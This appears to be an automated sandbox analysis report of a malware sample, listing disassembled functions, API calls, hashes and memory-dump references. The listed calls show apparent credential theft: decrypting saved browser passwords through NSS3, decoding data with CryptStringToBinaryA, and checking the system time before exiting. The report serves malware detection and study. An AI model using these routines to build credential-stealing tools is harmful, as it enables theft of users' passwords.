Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: 0f799c378c1b40ff908eb4ae328bfde9eb48e064251380e2bda4d6e10fdc0466
Instruction ID: b6bb944ccdc5cf43a6fe1a0c5355ac46a19ac528caffc816174e7fed91ce28a0
Opcode Fuzzy Hash: 0f799c378c1b40ff908eb4ae328bfde9eb48e064251380e2bda4d6e10fdc0466
Instruction Fuzzy Hash: A8F18E718351189ADB15FB60DD96EEE7338AF54300F9041EAA50A72091EF306FEACF65

Function 0025C820 Relevance: 13.6, APIs: 9, Instructions: 95stringencryptionCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0025C871
CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0025C87C
PK11_GetInternalKeySlot.NSS3 ref: 0025C88A
PK11_Authenticate.NSS3(00000000,00000001,00000000), ref: 0025C8A5
PK11SDR_Decrypt.NSS3(?,?,00000000), ref: 0025C8EB
lstrcat.KERNEL32(?,00270B46), ref: 0025C943
lstrcat.KERNEL32(?,00270B47), ref: 0025C957
PK11_FreeSlot.NSS3(?), ref: 0025C961
lstrcat.KERNEL32(?,00270B4E), ref: 0025C978

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: K11_lstrcat$Slot$AuthenticateBinaryCryptDecryptFreeInternalStringlstrlen
String ID:
API String ID: 3356303513-0
Opcode ID: 199d3598547b297905b425f4235f226f7be3bb0096b94f6d0f39570c17c50a1d
Instruction ID: cef9177a8575cd9a2c4cd13d43496c3371546534edf6aee99a24d2fa3c714702
Opcode Fuzzy Hash: 199d3598547b297905b425f4235f226f7be3bb0096b94f6d0f39570c17c50a1d
Instruction Fuzzy Hash: 56416EB491421ADFDB10DF90DC89BFEB7B8BB48304F1041B9F509A6280D7705A98CF95

Function 0061BFBE Relevance: 12.9, Strings: 9, Instructions: 1662COMMON

Download Yara Rule

Strings

K\?3, xrefs: 0061CE07
%w, xrefs: 0061C53D
w%_W, xrefs: 0061CD64
"2?, xrefs: 0061CAA3
ih?, xrefs: 0061D184
qF;=, xrefs: 0061C2A2
jua, xrefs: 0061CFA7
i]], xrefs: 0061C900
?_M, xrefs: 0061C2C9

Memory Dump Source

Source File: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID: %w$"2?$?_M$K\?3$ih?$jua$qF;=$w%_W$i]]
API String ID: 0-2270943067
Opcode ID: 7b18a10ffa6e0b84590a13f2b96cde629b9e96d87b2cc282427a86e1cf201f63
Instruction ID: 5c45be6787d9d2a6c476a597501945c8fbf1b4276d850fbd2581cbb4a848a587
Opcode Fuzzy Hash: 7b18a10ffa6e0b84590a13f2b96cde629b9e96d87b2cc282427a86e1cf201f63
Instruction Fuzzy Hash: 2DB2D3F36082049FE304AE2EEC8567AFBE9EFD4720F16893DE6C4C3744E63558058696

Function 6C602C10 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 228stringCOMMON

Download Yara Rule

APIs

?EcmaScriptConverter@DoubleToStringConverter@double_conversion@@SAABV12@XZ.MOZGLUE ref: 6C602C31
?ToShortestIeeeNumber@DoubleToStringConverter@double_conversion@@ABE_NNPAVStringBuilder@2@W4DtoaMode@12@@Z.MOZGLUE ref: 6C602C61

Part of subcall function 6C5B4DE0: ?DoubleToAscii@DoubleToStringConverter@double_conversion@@SAXNW4DtoaMode@12@HPADHPA_NPAH3@Z.MOZGLUE ref: 6C5B4E5A
Part of subcall function 6C5B4DE0: ?CreateDecimalRepresentation@DoubleToStringConverter@double_conversion@@ABEXPBDHHHPAVStringBuilder@2@@Z.MOZGLUE(?,?,?,?,?), ref: 6C5B4E97

strlen.API-MS-WIN-CRT-STRING-L1-1-0 ref: 6C602C82
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002), ref: 6C602E2D

Part of subcall function 6C5C81B0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,00000000,?,ProfileBuffer parse error: %s,expected a ProfilerOverheadDuration entry after ProfilerOverheadTime), ref: 6C5C81DE

Strings

ProfileBuffer parse error: %s, xrefs: 6C602E3B
(root), xrefs: 6C60354F
expected a Time entry, xrefs: 6C602E36

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Dtoa$Ascii@Builder@2@Builder@2@@Converter@CreateDecimalEcmaIeeeMode@12@Mode@12@@Number@Representation@ScriptShortestV12@__acrt_iob_func__stdio_common_vfprintfstrlen
String ID: (root)$ProfileBuffer parse error: %s$expected a Time entry
API String ID: 801438305-4149320968
Opcode ID: 2c82a2496293819d66d73146901b10d98043de8cd4525e4467249546754d8164
Instruction ID: 5b549e4ddeee69a79c69d5d9309d0ca0a3cf99f65e35bc28ca0dc4536040c7b1
Opcode Fuzzy Hash: 2c82a2496293819d66d73146901b10d98043de8cd4525e4467249546754d8164
Instruction Fuzzy Hash: 1D91D0707087408FC728CF24C58469EB7E0AFCA358F10492DE59AA7790DB30D949CB5A

Function 6C5BD4E0 Relevance: 10.8, Strings: 8, Instructions: 805COMMON

Download Yara Rule

Strings

9, xrefs: 6C5BDE7F
@, xrefs: 6C5BDAF6
1, xrefs: 6C5BDBDD
0, xrefs: 6C5BDC7F
8, xrefs: 6C5BDC08
, xrefs: 6C5BDA88
0, xrefs: 6C5BD852
-, xrefs: 6C5BD7DD

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID:
String ID: $-$0$0$1$8$9$@
API String ID: 0-3654031807
Opcode ID: 1b76267a9b05166584d88426c9445044a3075451e1d55731fddde01707612471
Instruction ID: 384cacc2f2a325e0d15109266382003c8ae99ea863c7983c51d183ef4f7df7a6
Opcode Fuzzy Hash: 1b76267a9b05166584d88426c9445044a3075451e1d55731fddde01707612471
Instruction Fuzzy Hash: 0562DF7150C7458FD705CF18C8A07AABFF2AF86358F184A1DE4E56BA99C335D885CB82

Function 6C62545C Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 305COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C628A4B

Strings

~q[l, xrefs: 6C629459, 6C6256C7, 6C62921F, 6C625740, 6C629269, 6C625703, 6C62948F

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: memset
String ID: ~q[l
API String ID: 2221118986-3806110520
Opcode ID: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction ID: 01282cb0d9d4f68bbd63aea8035c4841c000ec8774f2f5a3ebc4651f0eb0893d
Opcode Fuzzy Hash: 83bd3679e087d2f8c0a363543460151d132c5b050c0c1d93b1d77d16f48f2b37
Instruction Fuzzy Hash: 68B10972E0521A8FDB24CF68CC907D8B7B2EF85314F1802A9C549DB795D734A985CF94

Function 6C62542B Relevance: 9.3, APIs: 5, Strings: 1, Instructions: 287COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,000000FF,?), ref: 6C6288F0
memset.VCRUNTIME140(?,000000FF,?,?), ref: 6C62925C

Strings

~q[l, xrefs: 6C629459, 6C6256C7, 6C62921F, 6C625740, 6C629269, 6C625703, 6C62948F

Memory Dump Source

Source File: 00000000.00000002.1957137509.000000006C5B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C5B0000, based on PE: true

Associated: 00000000.00000002.1957123713.000000006C5B0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957182154.000000006C62D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957200148.000000006C63E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.1957319931.000000006C642000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5b0000_file.jbxd

Similarity

API ID: memset
String ID: ~q[l
API String ID: 2221118986-3806110520
Opcode ID: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction ID: e00074b9e204e74789a6d96576fd14392b9c32d81c20ab6262a4db47e496d49a
Opcode Fuzzy Hash: 79f258be636af245f773d231f88ec99e234031016a7ca9cdfbf0dc900f23d892
Instruction Fuzzy Hash: A2B1E572E0520A8BDB14CF68CC806EDB7B2EF95314F180269C949EB795D734A989CF94

Function 006152D5 Relevance: 9.2, Strings: 6, Instructions: 1653COMMON

Download Yara Rule

Strings

@e;?, xrefs: 00615473
sy, xrefs: 00615BB5
h43v, xrefs: 00615AFE
(2.@, xrefs: 00616297
oG, xrefs: 00615CE7
$9sY, xrefs: 00615B45

Memory Dump Source

Source File: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID: sy$$9sY$(2.@$@e;?$h43v$oG
API String ID: 0-1140888511
Opcode ID: 6c7013b5ad7d4ee42281b35581f0dd72d318c960eb2da29ceb88a5cf38192e42
Instruction ID: e4d45d5ec311ea4cfa62aa535f3cfe89cab44c67329c97e6fc2374413a5bbc3c
Opcode Fuzzy Hash: 6c7013b5ad7d4ee42281b35581f0dd72d318c960eb2da29ceb88a5cf38192e42
Instruction Fuzzy Hash: 77B238F360C2049FE7046E2DEC8567AFBE9EF94720F1A463DEAC583744EA3558058687

Function 00259AC0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55encryptionmemoryCOMMON

Download Yara Rule

APIs

CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N%,00000000,00000000), ref: 00259AEF
LocalAlloc.KERNEL32(00000040,?,?,?,00254EEE,00000000,?), ref: 00259B01
CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,N%,00000000,00000000), ref: 00259B2A
LocalFree.KERNEL32(?,?,?,?,00254EEE,00000000,?), ref: 00259B3F

Strings

N%, xrefs: 00259AD4, 00259AE1, 00259AF9, 00259B18, 00259AE4, 00259B1B

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID: BinaryCryptLocalString$AllocFree
String ID: N%
API String ID: 4291131564-3251577424
Opcode ID: 56797f43c1351f1340adb7f9e336d7fdc7be616eb9dd480a64d417dd7ab74946
Instruction ID: fb02e718c87e629b89ff90fa1ddf893c729bf6effde5ba44ec540e6414ec6472
Opcode Fuzzy Hash: 56797f43c1351f1340adb7f9e336d7fdc7be616eb9dd480a64d417dd7ab74946
Instruction Fuzzy Hash: 3B11A2B4240208EFEB10CF64DC95FAA77B5FB89705F208069FD199B390C7B6A951CB94

Function 00613832 Relevance: 7.9, Strings: 5, Instructions: 1633COMMON

Download Yara Rule

Strings

C,O, xrefs: 006145B5
P&?_, xrefs: 00613F02
P>Om, xrefs: 00613A98
bWw/, xrefs: 006147A9
i'ob, xrefs: 0061459C

Memory Dump Source

Source File: 00000000.00000002.1935608313.00000000004AE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000036E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000003F5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000415000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000041B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000049A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000629000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000730000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000738000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935608313.0000000000747000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935827962.0000000000748000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935928823.00000000008E2000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_250000_file.jbxd

Yara matches

Similarity

API ID:
String ID: C,O$P&?_$P>Om$bWw/$i'ob
API String ID: 0-4016568288
Opcode ID: 5f26d3b4ee3865d21be283cb53fe2d5ccb9692091c9b38fc5d85294325d0f4af
Instruction ID: 29dcc77b53659799cf5697b04a6ffba5041c48c79a8d63200382da7b31f5129c
Opcode Fuzzy Hash: 5f26d3b4ee3865d21be283cb53fe2d5ccb9692091c9b38fc5d85294325d0f4af
Instruction Fuzzy Hash: E8B208F360C2049FE304AE2DEC8567ABBE5EF94720F16853DEAC4C7744EA3598058697

Function 00266920 Relevance: 7.6, APIs: 5, Instructions: 67timeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(?), ref: 0026696C
sscanf.NTDLL ref: 00266999
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002669B2
SystemTimeToFileTime.KERNEL32(?,00000000), ref: 002669C0
ExitProcess.KERNEL32 ref: 002669DA

Memory Dump Source

Source File: 00000000.00000002.1935243410.0000000000251000.00000040.00000001.01000000.00000003.sdmp, Offset: 00250000, based on PE: true

Associated: 00000000.00000002.1935203729.0000000000250000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002D8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002DF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.00000000002E2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000301000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000030D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000033F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1935243410.000000000035F000.00000040.00000001.01000000.00000003.sdmpDownload File
